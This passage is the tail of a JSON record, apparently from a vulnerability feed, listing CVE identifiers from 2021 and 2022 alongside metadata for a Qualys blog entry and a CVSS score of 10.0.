"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}